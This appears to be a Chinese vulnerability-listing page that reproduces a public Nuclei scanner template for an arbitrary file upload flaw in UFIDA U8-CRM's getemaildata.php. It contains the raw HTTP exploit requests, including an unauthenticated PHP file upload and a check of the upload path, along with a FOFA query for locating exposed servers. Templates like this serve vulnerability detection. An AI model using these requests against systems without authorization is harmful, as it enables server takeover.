yonyou-u8-crm-fileupload: UFIDA U8-CRM getemaildata - Arbitary File Upload

日期: 2025-08-01 | 影响软件: UFIDA U8-CRM | POC: 已公开

漏洞描述

There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.

PoC代码[已公开]

id: yonyou-u8-crm-fileupload

info:
  name: UFIDA U8-CRM getemaildata - Arbitary File Upload
  author: SleepingBag945,pussycat0x
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="用友U8CRM"
  tags: yonyou,file-upload,u8-crm,intrusive,vuln

http:
  - raw:
      - |
        POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 300
        Cache-Control: max-age=0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Origin: null
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8
        Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0

        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
        Content-Disposition: form-data; name="file"; filename="%s.php "
        Content-Type: application/octet-stream

        {{randstr}}
        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
        Content-Disposition: form-data; name="upload"

        upload
        ------WebKitFormBoundaryAVuAKsvesmnWtgEP--
      - |
        GET /tmpfile/{{path}}.tmp.mht HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200 && status_code_2==200"
          - "contains(body_2, '{{randstr}}')"
        condition: and

    extractors:
      - type: regex
        part: body_1
        internal: true
        name: path
        group: 1
        regex:
          - '([a-zA-Z0-9]+)\.tmp\.mht'
# digest: 4a0a0047304502201211dd53297d5e824c1f25ff28bea4abc4fb6f8f22638f15d046e8d5e48f55e7022100ded16a620966900cc0ce27da3431e8fa80d62580c41ec36d47c94bc9f0dca341:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml

相关漏洞推荐